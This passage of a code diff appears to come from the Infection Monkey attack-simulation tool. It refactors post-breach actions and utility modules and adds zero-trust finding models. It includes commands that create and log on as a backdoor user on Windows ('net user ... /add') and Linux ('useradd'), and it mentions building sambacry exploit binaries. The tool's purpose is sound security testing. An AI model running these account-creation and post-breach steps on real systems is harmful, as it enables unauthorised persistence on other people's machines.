"Failed to open process as user {}. Error: {}".format(username, str(e)), False)).send()
|
||||||
|
finally:
|
||||||
|
try:
|
||||||
|
win32api.CloseHandle(process_handle)
|
||||||
|
win32api.CloseHandle(thread_handle)
|
||||||
|
except Exception as err:
|
||||||
|
logger.error("Close handle error: " + str(err))
|
||||||
|
except subprocess.CalledProcessError as err:
|
||||||
|
PostBreachTelem(self, (
|
||||||
|
"Couldn't create the user '{}'. Error output is: '{}'".format(username, str(err)),
|
||||||
|
False)).send()
|
||||||
|
except NewUserError as e:
|
||||||
|
PostBreachTelem(self, (str(e), False)).send()
|
||||||
|
|
||||||
|
def send_ping_result_telemetry(self, exit_status, commandline, username):
|
||||||
|
"""
|
||||||
|
Parses the result of ping and sends telemetry accordingly.
|
||||||
|
|
||||||
|
:param exit_status: In both Windows and Linux, 0 exit code from Ping indicates success.
|
||||||
|
:param commandline: Exact commandline which was executed, for reporting back.
|
||||||
|
:param username: Username from which the command was executed, for reporting back.
|
||||||
|
"""
|
||||||
|
if exit_status == 0:
|
||||||
|
PostBreachTelem(self, (
|
||||||
|
CREATED_PROCESS_AS_USER_PING_SUCCESS_FORMAT.format(commandline, username), True)).send()
|
||||||
|
else:
|
||||||
|
PostBreachTelem(self, (
|
||||||
|
CREATED_PROCESS_AS_USER_PING_FAILED_FORMAT.format(commandline, username, exit_status), False)).send()
|
|
@ -1,11 +1,12 @@
|
||||||
import os
|
import os
|
||||||
import logging
|
import logging
|
||||||
|
|
||||||
from infection_monkey.utils import is_windows_os
|
from common.data.post_breach_consts import POST_BREACH_FILE_EXECUTION
|
||||||
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
from infection_monkey.post_breach.pba import PBA
|
from infection_monkey.post_breach.pba import PBA
|
||||||
from infection_monkey.control import ControlClient
|
from infection_monkey.control import ControlClient
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.utils import get_monkey_dir_path
|
from infection_monkey.utils.monkey_dir import get_monkey_dir_path
|
||||||
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
from infection_monkey.telemetry.attack.t1105_telem import T1105Telem
|
||||||
from common.utils.attack_utils import ScanStatus
|
from common.utils.attack_utils import ScanStatus
|
||||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||||
|
@ -27,7 +28,7 @@ class UsersPBA(PBA):
|
||||||
Defines user's configured post breach action.
|
Defines user's configured post breach action.
|
||||||
"""
|
"""
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
super(UsersPBA, self).__init__("Custom post breach action")
|
super(UsersPBA, self).__init__(POST_BREACH_FILE_EXECUTION)
|
||||||
self.filename = ''
|
self.filename = ''
|
||||||
if not is_windows_os():
|
if not is_windows_os():
|
||||||
# Add linux commands to PBA's
|
# Add linux commands to PBA's
|
||||||
|
|
|
@ -3,7 +3,7 @@ import subprocess
|
||||||
|
|
||||||
from common.utils.attack_utils import ScanStatus
|
from common.utils.attack_utils import ScanStatus
|
||||||
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||||
from infection_monkey.utils import is_windows_os
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.telemetry.attack.t1064_telem import T1064Telem
|
from infection_monkey.telemetry.attack.t1064_telem import T1064Telem
|
||||||
|
|
||||||
|
@ -21,7 +21,8 @@ class PBA(object):
|
||||||
def __init__(self, name="unknown", linux_cmd="", windows_cmd=""):
|
def __init__(self, name="unknown", linux_cmd="", windows_cmd=""):
|
||||||
"""
|
"""
|
||||||
:param name: Name of post breach action.
|
:param name: Name of post breach action.
|
||||||
:param command: Command that will be executed on breached machine
|
:param linux_cmd: Command that will be executed on breached machine
|
||||||
|
:param windows_cmd: Command that will be executed on breached machine
|
||||||
"""
|
"""
|
||||||
self.command = PBA.choose_command(linux_cmd, windows_cmd)
|
self.command = PBA.choose_command(linux_cmd, windows_cmd)
|
||||||
self.name = name
|
self.name = name
|
||||||
|
|
|
@ -3,7 +3,7 @@ import inspect
|
||||||
import importlib
|
import importlib
|
||||||
from infection_monkey.post_breach.pba import PBA
|
from infection_monkey.post_breach.pba import PBA
|
||||||
from infection_monkey.post_breach.actions import get_pba_files
|
from infection_monkey.post_breach.actions import get_pba_files
|
||||||
from infection_monkey.utils import is_windows_os
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -25,8 +25,12 @@ class PostBreach(object):
|
||||||
Executes all post breach actions.
|
Executes all post breach actions.
|
||||||
"""
|
"""
|
||||||
for pba in self.pba_list:
|
for pba in self.pba_list:
|
||||||
pba.run()
|
try:
|
||||||
LOG.info("Post breach actions executed")
|
LOG.debug("Executing PBA: '{}'".format(pba.name))
|
||||||
|
pba.run()
|
||||||
|
except Exception as e:
|
||||||
|
LOG.error("PBA {} failed. Error info: {}".format(pba.name, e))
|
||||||
|
LOG.info("All PBAs executed. Total {} executed.".format(len(self.pba_list)))
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def config_to_pba_list():
|
def config_to_pba_list():
|
||||||
|
@ -45,7 +49,9 @@ class PostBreach(object):
|
||||||
if ((m[1].__module__ == module.__name__) and issubclass(m[1], PBA))]
|
if ((m[1].__module__ == module.__name__) and issubclass(m[1], PBA))]
|
||||||
# Get post breach action object from class
|
# Get post breach action object from class
|
||||||
for pba_class in pba_classes:
|
for pba_class in pba_classes:
|
||||||
|
LOG.debug("Checking if should run PBA {}".format(pba_class.__name__))
|
||||||
if pba_class.should_run(pba_class.__name__):
|
if pba_class.should_run(pba_class.__name__):
|
||||||
pba = pba_class()
|
pba = pba_class()
|
||||||
pba_list.append(pba)
|
pba_list.append(pba)
|
||||||
|
LOG.debug("Added PBA {} to PBA list".format(pba_class.__name__))
|
||||||
return pba_list
|
return pba_list
|
||||||
|
|
|
@ -62,7 +62,7 @@ a. Build sambacry binaries yourself
|
||||||
a.1. Install gcc-multilib if it's not installed
|
a.1. Install gcc-multilib if it's not installed
|
||||||
sudo apt-get install gcc-multilib
|
sudo apt-get install gcc-multilib
|
||||||
a.2. Build the binaries
|
a.2. Build the binaries
|
||||||
cd [code location]/infection_monkey/monkey_utils/sambacry_monkey_runner
|
cd [code location]/infection_monkey/exploit/sambacry_monkey_runner
|
||||||
./build.sh
|
./build.sh
|
||||||
|
|
||||||
b. Download our pre-built sambacry binaries
|
b. Download our pre-built sambacry binaries
|
||||||
|
|
|
@ -4,8 +4,7 @@ import sys
|
||||||
from abc import ABCMeta, abstractmethod
|
from abc import ABCMeta, abstractmethod
|
||||||
|
|
||||||
from infection_monkey.config import WormConfiguration
|
from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.telemetry.attack.t1106_telem import T1106Telem
|
|
||||||
from common.utils.attack_utils import ScanStatus, UsageEnum
|
|
||||||
|
|
||||||
__author__ = 'itamar'
|
__author__ = 'itamar'
|
||||||
|
|
||||||
|
@ -46,21 +45,13 @@ class WindowsSystemSingleton(_SystemSingleton):
|
||||||
ctypes.c_char_p(self._mutex_name))
|
ctypes.c_char_p(self._mutex_name))
|
||||||
last_error = ctypes.windll.kernel32.GetLastError()
|
last_error = ctypes.windll.kernel32.GetLastError()
|
||||||
|
|
||||||
status = None
|
|
||||||
if not handle:
|
if not handle:
|
||||||
LOG.error("Cannot acquire system singleton %r, unknown error %d",
|
LOG.error("Cannot acquire system singleton %r, unknown error %d",
|
||||||
self._mutex_name, last_error)
|
self._mutex_name, last_error)
|
||||||
status = ScanStatus.SCANNED
|
return False
|
||||||
|
|
||||||
if winerror.ERROR_ALREADY_EXISTS == last_error:
|
if winerror.ERROR_ALREADY_EXISTS == last_error:
|
||||||
status = ScanStatus.SCANNED
|
|
||||||
LOG.debug("Cannot acquire system singleton %r, mutex already exist",
|
LOG.debug("Cannot acquire system singleton %r, mutex already exist",
|
||||||
self._mutex_name)
|
self._mutex_name)
|
||||||
|
|
||||||
if not status:
|
|
||||||
status = ScanStatus.USED
|
|
||||||
T1106Telem(status, UsageEnum.SINGLETON_WINAPI).send()
|
|
||||||
if status == ScanStatus.SCANNED:
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
self._mutex_handle = handle
|
self._mutex_handle = handle
|
||||||
|
@ -71,7 +62,6 @@ class WindowsSystemSingleton(_SystemSingleton):
|
||||||
|
|
||||||
def unlock(self):
|
def unlock(self):
|
||||||
assert self._mutex_handle is not None, "Singleton not locked"
|
assert self._mutex_handle is not None, "Singleton not locked"
|
||||||
|
|
||||||
ctypes.windll.kernel32.CloseHandle(self._mutex_handle)
|
ctypes.windll.kernel32.CloseHandle(self._mutex_handle)
|
||||||
self._mutex_handle = None
|
self._mutex_handle = None
|
||||||
|
|
||||||
|
|
|
@ -1,7 +1,11 @@
|
||||||
import abc
|
import abc
|
||||||
|
import json
|
||||||
|
import logging
|
||||||
|
|
||||||
from infection_monkey.control import ControlClient
|
from infection_monkey.control import ControlClient
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
||||||
|
@ -19,7 +23,9 @@ class BaseTelem(object):
|
||||||
"""
|
"""
|
||||||
Sends telemetry to island
|
Sends telemetry to island
|
||||||
"""
|
"""
|
||||||
ControlClient.send_telemetry(self.telem_category, self.get_data())
|
data = self.get_data()
|
||||||
|
logger.debug("Sending {} telemetry. Data: {}".format(self.telem_category, json.dumps(data)))
|
||||||
|
ControlClient.send_telemetry(self.telem_category, data)
|
||||||
|
|
||||||
@abc.abstractproperty
|
@abc.abstractproperty
|
||||||
def telem_category(self):
|
def telem_category(self):
|
||||||
|
|
|
@ -1,62 +0,0 @@
|
||||||
import os
|
|
||||||
import shutil
|
|
||||||
import struct
|
|
||||||
import sys
|
|
||||||
import tempfile
|
|
||||||
|
|
||||||
from infection_monkey.config import WormConfiguration
|
|
||||||
|
|
||||||
|
|
||||||
def get_monkey_log_path():
|
|
||||||
return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
|
|
||||||
else WormConfiguration.monkey_log_path_linux
|
|
||||||
|
|
||||||
|
|
||||||
def get_dropper_log_path():
|
|
||||||
return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
|
|
||||||
else WormConfiguration.dropper_log_path_linux
|
|
||||||
|
|
||||||
|
|
||||||
def is_64bit_windows_os():
|
|
||||||
"""
|
|
||||||
Checks for 64 bit Windows OS using environment variables.
|
|
||||||
"""
|
|
||||||
return 'PROGRAMFILES(X86)' in os.environ
|
|
||||||
|
|
||||||
|
|
||||||
def is_64bit_python():
|
|
||||||
return struct.calcsize("P") == 8
|
|
||||||
|
|
||||||
|
|
||||||
def is_windows_os():
|
|
||||||
return sys.platform.startswith("win")
|
|
||||||
|
|
||||||
|
|
||||||
def utf_to_ascii(string):
|
|
||||||
# Converts utf string to ascii. Safe to use even if string is already ascii.
|
|
||||||
udata = string.decode("utf-8")
|
|
||||||
return udata.encode("ascii", "ignore")
|
|
||||||
|
|
||||||
|
|
||||||
def create_monkey_dir():
|
|
||||||
"""
|
|
||||||
Creates directory for monkey and related files
|
|
||||||
"""
|
|
||||||
if not os.path.exists(get_monkey_dir_path()):
|
|
||||||
os.mkdir(get_monkey_dir_path())
|
|
||||||
|
|
||||||
|
|
||||||
def remove_monkey_dir():
|
|
||||||
"""
|
|
||||||
Removes monkey's root directory
|
|
||||||
:return True if removed without errors and False otherwise
|
|
||||||
"""
|
|
||||||
try:
|
|
||||||
shutil.rmtree(get_monkey_dir_path())
|
|
||||||
return True
|
|
||||||
except Exception:
|
|
||||||
return False
|
|
||||||
|
|
||||||
|
|
||||||
def get_monkey_dir_path():
|
|
||||||
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
|
|
@ -0,0 +1,18 @@
|
||||||
|
import os
|
||||||
|
import struct
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
|
def is_64bit_windows_os():
|
||||||
|
"""
|
||||||
|
Checks for 64 bit Windows OS using environment variables.
|
||||||
|
"""
|
||||||
|
return 'PROGRAMFILES(X86)' in os.environ
|
||||||
|
|
||||||
|
|
||||||
|
def is_64bit_python():
|
||||||
|
return struct.calcsize("P") == 8
|
||||||
|
|
||||||
|
|
||||||
|
def is_windows_os():
|
||||||
|
return sys.platform.startswith("win")
|
|
@ -0,0 +1,21 @@
|
||||||
|
import datetime
|
||||||
|
|
||||||
|
|
||||||
|
def get_linux_commands_to_add_user(username):
|
||||||
|
return [
|
||||||
|
'useradd',
|
||||||
|
'-M', # Do not create homedir
|
||||||
|
'--expiredate',
|
||||||
|
datetime.datetime.today().strftime('%Y-%m-%d'),
|
||||||
|
'--inactive',
|
||||||
|
'0',
|
||||||
|
'-c', # Comment
|
||||||
|
'MONKEY_USER', # Comment
|
||||||
|
username]
|
||||||
|
|
||||||
|
|
||||||
|
def get_linux_commands_to_delete_user(username):
|
||||||
|
return [
|
||||||
|
'deluser',
|
||||||
|
username
|
||||||
|
]
|
|
@ -0,0 +1,29 @@
|
||||||
|
import os
|
||||||
|
import shutil
|
||||||
|
import tempfile
|
||||||
|
|
||||||
|
from infection_monkey.config import WormConfiguration
|
||||||
|
|
||||||
|
|
||||||
|
def create_monkey_dir():
|
||||||
|
"""
|
||||||
|
Creates directory for monkey and related files
|
||||||
|
"""
|
||||||
|
if not os.path.exists(get_monkey_dir_path()):
|
||||||
|
os.mkdir(get_monkey_dir_path())
|
||||||
|
|
||||||
|
|
||||||
|
def remove_monkey_dir():
|
||||||
|
"""
|
||||||
|
Removes monkey's root directory
|
||||||
|
:return True if removed without errors and False otherwise
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
shutil.rmtree(get_monkey_dir_path())
|
||||||
|
return True
|
||||||
|
except Exception:
|
||||||
|
return False
|
||||||
|
|
||||||
|
|
||||||
|
def get_monkey_dir_path():
|
||||||
|
return os.path.join(tempfile.gettempdir(), WormConfiguration.monkey_dir_name)
|
|
@ -0,0 +1,14 @@
|
||||||
|
import os
|
||||||
|
import sys
|
||||||
|
|
||||||
|
from infection_monkey.config import WormConfiguration
|
||||||
|
|
||||||
|
|
||||||
|
def get_monkey_log_path():
|
||||||
|
return os.path.expandvars(WormConfiguration.monkey_log_path_windows) if sys.platform == "win32" \
|
||||||
|
else WormConfiguration.monkey_log_path_linux
|
||||||
|
|
||||||
|
|
||||||
|
def get_dropper_log_path():
|
||||||
|
return os.path.expandvars(WormConfiguration.dropper_log_path_windows) if sys.platform == "win32" \
|
||||||
|
else WormConfiguration.dropper_log_path_linux
|
|
@ -0,0 +1,10 @@
|
||||||
|
from infection_monkey.utils.linux.users import get_linux_commands_to_add_user
|
||||||
|
from infection_monkey.utils.windows.users import get_windows_commands_to_add_user
|
||||||
|
|
||||||
|
|
||||||
|
def get_commands_to_add_user(username, password):
|
||||||
|
linux_cmds = get_linux_commands_to_add_user(username)
|
||||||
|
windows_cmds = get_windows_commands_to_add_user(username, password)
|
||||||
|
return linux_cmds, windows_cmds
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,69 @@
|
||||||
|
import logging
|
||||||
|
import subprocess
|
||||||
|
|
||||||
|
from infection_monkey.post_breach.actions.add_user import BackdoorUser
|
||||||
|
from infection_monkey.utils.windows.users import get_windows_commands_to_delete_user, get_windows_commands_to_add_user
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
class NewUserError(Exception):
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
class AutoNewUser(object):
|
||||||
|
"""
|
||||||
|
RAII object to use for creating and using a new user in Windows. Use with `with`.
|
||||||
|
User will be created when the instance is instantiated.
|
||||||
|
User will log on at the start of the `with` scope.
|
||||||
|
User will log off and get deleted at the end of said `with` scope.
|
||||||
|
|
||||||
|
Example:
|
||||||
|
# Created # Logged on
|
||||||
|
with AutoNewUser("user", "pass") as new_user:
|
||||||
|
...
|
||||||
|
...
|
||||||
|
# Logged off and deleted
|
||||||
|
...
|
||||||
|
"""
|
||||||
|
def __init__(self, username, password):
|
||||||
|
"""
|
||||||
|
Creates a user with the username + password.
|
||||||
|
:raises: subprocess.CalledProcessError if failed to add the user.
|
||||||
|
"""
|
||||||
|
self.username = username
|
||||||
|
self.password = password
|
||||||
|
|
||||||
|
windows_cmds = get_windows_commands_to_add_user(self.username, self.password, True)
|
||||||
|
_ = subprocess.check_output(windows_cmds, stderr=subprocess.STDOUT, shell=True)
|
||||||
|
|
||||||
|
def __enter__(self):
|
||||||
|
# Importing these only on windows, as they won't exist on linux.
|
||||||
|
import win32security
|
||||||
|
import win32con
|
||||||
|
|
||||||
|
try:
|
||||||
|
# Logon as new user: https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonusera
|
||||||
|
self.logon_handle = win32security.LogonUser(
|
||||||
|
self.username,
|
||||||
|
".", # Use current domain.
|
||||||
|
self.password,
|
||||||
|
win32con.LOGON32_LOGON_INTERACTIVE, # Logon type - interactive (normal user).
|
||||||
|
win32con.LOGON32_PROVIDER_DEFAULT) # Which logon provider to use - whatever Windows offers.
|
||||||
|
except Exception as err:
|
||||||
|
raise NewUserError("Can't logon as {}. Error: {}".format(self.username, str(err)))
|
||||||
|
return self
|
||||||
|
|
||||||
|
def get_logon_handle(self):
|
||||||
|
return self.logon_handle
|
||||||
|
|
||||||
|
def __exit__(self, exc_type, exc_val, exc_tb):
|
||||||
|
# Logoff
|
||||||
|
self.logon_handle.Close()
|
||||||
|
|
||||||
|
# Try to delete user
|
||||||
|
try:
|
||||||
|
_ = subprocess.Popen(
|
||||||
|
get_windows_commands_to_delete_user(self.username), stderr=subprocess.STDOUT, shell=True)
|
||||||
|
except Exception as err:
|
||||||
|
raise NewUserError("Can't delete user {}. Info: {}".format(self.username, err))
|
|
@ -0,0 +1,18 @@
|
||||||
|
def get_windows_commands_to_add_user(username, password, should_be_active=False):
|
||||||
|
windows_cmds = [
|
||||||
|
'net',
|
||||||
|
'user',
|
||||||
|
username,
|
||||||
|
password,
|
||||||
|
'/add']
|
||||||
|
if not should_be_active:
|
||||||
|
windows_cmds.append('/ACTIVE:NO')
|
||||||
|
return windows_cmds
|
||||||
|
|
||||||
|
|
||||||
|
def get_windows_commands_to_delete_user(username):
|
||||||
|
return [
|
||||||
|
'net',
|
||||||
|
'user',
|
||||||
|
username,
|
||||||
|
'/delete']
|
|
@ -10,7 +10,7 @@ from infection_monkey.config import WormConfiguration
|
||||||
from infection_monkey.control import ControlClient
|
from infection_monkey.control import ControlClient
|
||||||
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
|
from infection_monkey.exploit.tools.helpers import build_monkey_commandline_explicitly
|
||||||
from infection_monkey.model import MONKEY_CMDLINE_WINDOWS
|
from infection_monkey.model import MONKEY_CMDLINE_WINDOWS
|
||||||
from infection_monkey.utils import is_windows_os, is_64bit_windows_os, is_64bit_python
|
from infection_monkey.utils.environment import is_windows_os, is_64bit_windows_os, is_64bit_python
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = 'itay.mizeretz'
|
||||||
|
|
||||||
|
|
|
@ -23,7 +23,7 @@ from monkey_island.cc.resources.monkey_download import MonkeyDownload
|
||||||
from monkey_island.cc.resources.netmap import NetMap
|
from monkey_island.cc.resources.netmap import NetMap
|
||||||
from monkey_island.cc.resources.node import Node
|
from monkey_island.cc.resources.node import Node
|
||||||
from monkey_island.cc.resources.remote_run import RemoteRun
|
from monkey_island.cc.resources.remote_run import RemoteRun
|
||||||
from monkey_island.cc.resources.report import Report
|
from monkey_island.cc.resources.reporting.report import Report
|
||||||
from monkey_island.cc.resources.root import Root
|
from monkey_island.cc.resources.root import Root
|
||||||
from monkey_island.cc.resources.telemetry import Telemetry
|
from monkey_island.cc.resources.telemetry import Telemetry
|
||||||
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
||||||
|
@ -125,7 +125,13 @@ def init_api_resources(api):
|
||||||
api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
|
api.add_resource(NetMap, '/api/netmap', '/api/netmap/')
|
||||||
api.add_resource(Edge, '/api/netmap/edge', '/api/netmap/edge/')
|
api.add_resource(Edge, '/api/netmap/edge', '/api/netmap/edge/')
|
||||||
api.add_resource(Node, '/api/netmap/node', '/api/netmap/node/')
|
api.add_resource(Node, '/api/netmap/node', '/api/netmap/node/')
|
||||||
api.add_resource(Report, '/api/report', '/api/report/')
|
|
||||||
|
# report_type: zero_trust or security
|
||||||
|
api.add_resource(
|
||||||
|
Report,
|
||||||
|
'/api/report/<string:report_type>',
|
||||||
|
'/api/report/<string:report_type>/<string:report_data>')
|
||||||
|
|
||||||
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
|
api.add_resource(TelemetryFeed, '/api/telemetry-feed', '/api/telemetry-feed/')
|
||||||
api.add_resource(Log, '/api/log', '/api/log/')
|
api.add_resource(Log, '/api/log', '/api/log/')
|
||||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||||
|
|
|
@ -1,5 +1,4 @@
|
||||||
from monkey_island.cc.environment import Environment
|
from monkey_island.cc.environment import Environment
|
||||||
import monkey_island.cc.auth
|
|
||||||
|
|
||||||
|
|
||||||
class TestingEnvironment(Environment):
|
class TestingEnvironment(Environment):
|
||||||
|
@ -7,11 +6,5 @@ class TestingEnvironment(Environment):
|
||||||
super(TestingEnvironment, self).__init__()
|
super(TestingEnvironment, self).__init__()
|
||||||
self.testing = True
|
self.testing = True
|
||||||
|
|
||||||
# SHA3-512 of '1234567890!@#$%^&*()_nothing_up_my_sleeve_1234567890!@#$%^&*()'
|
|
||||||
NO_AUTH_CREDS = '55e97c9dcfd22b8079189ddaeea9bce8125887e3237b800c6176c9afa80d2062' \
|
|
||||||
'8d2c8d0b1538d2208c1444ac66535b764a3d902b35e751df3faec1e477ed3557'
|
|
||||||
|
|
||||||
def get_auth_users(self):
|
def get_auth_users(self):
|
||||||
return [
|
return []
|
||||||
monkey_island.cc.auth.User(1, self.NO_AUTH_CREDS, self.NO_AUTH_CREDS)
|
|
||||||
]
|
|
||||||
|
|
|
@ -0,0 +1,32 @@
|
||||||
|
from common.data.zero_trust_consts import TEST_MALICIOUS_ACTIVITY_TIMELINE, STATUS_VERIFY
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
|
||||||
|
|
||||||
|
class AggregateFinding(Finding):
|
||||||
|
@staticmethod
|
||||||
|
def create_or_add_to_existing(test, status, events):
|
||||||
|
"""
|
||||||
|
Create a new finding or add the events to an existing one if it's the same (same meaning same status and same
|
||||||
|
test).
|
||||||
|
|
||||||
|
:raises: Assertion error if this is used when there's more then one finding which fits the query - this is not
|
||||||
|
when this function should be used.
|
||||||
|
"""
|
||||||
|
existing_findings = Finding.objects(test=test, status=status)
|
||||||
|
assert (len(existing_findings) < 2), "More than one finding exists for {}:{}".format(test, status)
|
||||||
|
|
||||||
|
if len(existing_findings) == 0:
|
||||||
|
Finding.save_finding(test, status, events)
|
||||||
|
else:
|
||||||
|
# Now we know for sure this is the only one
|
||||||
|
orig_finding = existing_findings[0]
|
||||||
|
orig_finding.add_events(events)
|
||||||
|
orig_finding.save()
|
||||||
|
|
||||||
|
|
||||||
|
def add_malicious_activity_to_timeline(events):
|
||||||
|
AggregateFinding.create_or_add_to_existing(
|
||||||
|
test=TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||||
|
status=STATUS_VERIFY,
|
||||||
|
events=events
|
||||||
|
)
|
|
@ -0,0 +1,36 @@
|
||||||
|
from datetime import datetime
|
||||||
|
|
||||||
|
from mongoengine import EmbeddedDocument, DateTimeField, StringField
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import EVENT_TYPES
|
||||||
|
|
||||||
|
|
||||||
|
class Event(EmbeddedDocument):
|
||||||
|
"""
|
||||||
|
This model represents a single event within a Finding (it is an EmbeddedDocument within Finding). It is meant to
|
||||||
|
hold a detail of the Finding.
|
||||||
|
|
||||||
|
This class has 2 main section:
|
||||||
|
* The schema section defines the DB fields in the document. This is the data of the object.
|
||||||
|
* The logic section defines complex questions we can ask about a single document which are asked multiple
|
||||||
|
times, or complex action we will perform - somewhat like an API.
|
||||||
|
"""
|
||||||
|
# SCHEMA
|
||||||
|
timestamp = DateTimeField(required=True)
|
||||||
|
title = StringField(required=True)
|
||||||
|
message = StringField()
|
||||||
|
event_type = StringField(required=True, choices=EVENT_TYPES)
|
||||||
|
|
||||||
|
# LOGIC
|
||||||
|
@staticmethod
|
||||||
|
def create_event(title, message, event_type, timestamp=datetime.now()):
|
||||||
|
event = Event(
|
||||||
|
timestamp=timestamp,
|
||||||
|
title=title,
|
||||||
|
message=message,
|
||||||
|
event_type=event_type
|
||||||
|
)
|
||||||
|
|
||||||
|
event.validate(clean=True)
|
||||||
|
|
||||||
|
return event
|
|
@ -0,0 +1,60 @@
|
||||||
|
# coding=utf-8
|
||||||
|
"""
|
||||||
|
Define a Document Schema for Zero Trust findings.
|
||||||
|
"""
|
||||||
|
|
||||||
|
from mongoengine import Document, StringField, EmbeddedDocumentListField
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import ORDERED_TEST_STATUSES, TESTS, TESTS_MAP, TEST_EXPLANATION_KEY, PILLARS_KEY
|
||||||
|
# Dummy import for mongoengine.
|
||||||
|
# noinspection PyUnresolvedReferences
|
||||||
|
from monkey_island.cc.models.zero_trust.event import Event
|
||||||
|
|
||||||
|
|
||||||
|
class Finding(Document):
|
||||||
|
"""
|
||||||
|
This model represents a Zero-Trust finding: A result of a test the monkey/island might perform to see if a
|
||||||
|
specific principle of zero trust is upheld or broken.
|
||||||
|
|
||||||
|
Findings might have the following statuses:
|
||||||
|
Failed ❌
|
||||||
|
Meaning that we are sure that something is wrong (example: segmentation issue).
|
||||||
|
Verify ⁉
|
||||||
|
Meaning that we need the user to check something himself (example: 2FA logs, AV missing).
|
||||||
|
Passed ✔
|
||||||
|
Meaning that we are sure that something is correct (example: Monkey failed exploiting).
|
||||||
|
|
||||||
|
This class has 2 main section:
|
||||||
|
* The schema section defines the DB fields in the document. This is the data of the object.
|
||||||
|
* The logic section defines complex questions we can ask about a single document which are asked multiple
|
||||||
|
times, or complex action we will perform - somewhat like an API.
|
||||||
|
"""
|
||||||
|
# SCHEMA
|
||||||
|
test = StringField(required=True, choices=TESTS)
|
||||||
|
status = StringField(required=True, choices=ORDERED_TEST_STATUSES)
|
||||||
|
events = EmbeddedDocumentListField(document_type=Event)
|
||||||
|
# http://docs.mongoengine.org/guide/defining-documents.html#document-inheritance
|
||||||
|
meta = {'allow_inheritance': True}
|
||||||
|
|
||||||
|
# LOGIC
|
||||||
|
def get_test_explanation(self):
|
||||||
|
return TESTS_MAP[self.test][TEST_EXPLANATION_KEY]
|
||||||
|
|
||||||
|
def get_pillars(self):
|
||||||
|
return TESTS_MAP[self.test][PILLARS_KEY]
|
||||||
|
|
||||||
|
# Creation methods
|
||||||
|
@staticmethod
|
||||||
|
def save_finding(test, status, events):
|
||||||
|
finding = Finding(
|
||||||
|
test=test,
|
||||||
|
status=status,
|
||||||
|
events=events)
|
||||||
|
|
||||||
|
finding.save()
|
||||||
|
|
||||||
|
return finding
|
||||||
|
|
||||||
|
def add_events(self, events):
|
||||||
|
# type: (list) -> None
|
||||||
|
self.events.extend(events)
|
|
@ -0,0 +1,50 @@
|
||||||
|
from mongoengine import StringField
|
||||||
|
|
||||||
|
from common.data.zero_trust_consts import TEST_SEGMENTATION, STATUS_FAILED, STATUS_PASSED
|
||||||
|
from monkey_island.cc.models.zero_trust.finding import Finding
|
||||||
|
|
||||||
|
|
||||||
|
def need_to_overwrite_status(saved_status, new_status):
|
||||||
|
return (saved_status == STATUS_PASSED) and (new_status == STATUS_FAILED)
|
||||||
|
|
||||||
|
|
||||||
|
class SegmentationFinding(Finding):
|
||||||
|
first_subnet = StringField()
|
||||||
|
second_subnet = StringField()
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def create_or_add_to_existing_finding(subnets, status, segmentation_event):
|
||||||
|
"""
|
||||||
|
Creates a segmentation finding. If a segmentation finding with the relevant subnets already exists, adds the
|
||||||
|
event to the existing finding, and the "worst" status is chosen (i.e. if the existing one is "Failed" it will
|
||||||
|
remain so).
|
||||||
|
|
||||||
|
:param subnets: the 2 subnets of this finding.
|
||||||
|
:param status: STATUS_PASSED or STATUS_FAILED
|
||||||
|
:param segmentation_event: The specific event
|
||||||
|
"""
|
||||||
|
assert len(subnets) == 2
|
||||||
|
|
||||||
|
# Sort them so A -> B and B -> A segmentation findings will be the same one.
|
||||||
|
subnets.sort()
|
||||||
|
|
||||||
|
existing_findings = SegmentationFinding.objects(first_subnet=subnets[0], second_subnet=subnets[1])
|
||||||
|
|
||||||
|
if len(existing_findings) == 0:
|
||||||
|
# No finding exists - create.
|
||||||
|
new_finding = SegmentationFinding(
|
||||||
|
first_subnet=subnets[0],
|
||||||
|
second_subnet=subnets[1],
|
||||||
|
test=TEST_SEGMENTATION,
|
||||||
|
status=status,
|
||||||
|
events=[segmentation_event]
|
||||||
|
)
|
||||||
|
new_finding.save()
|
||||||
|
else:
|
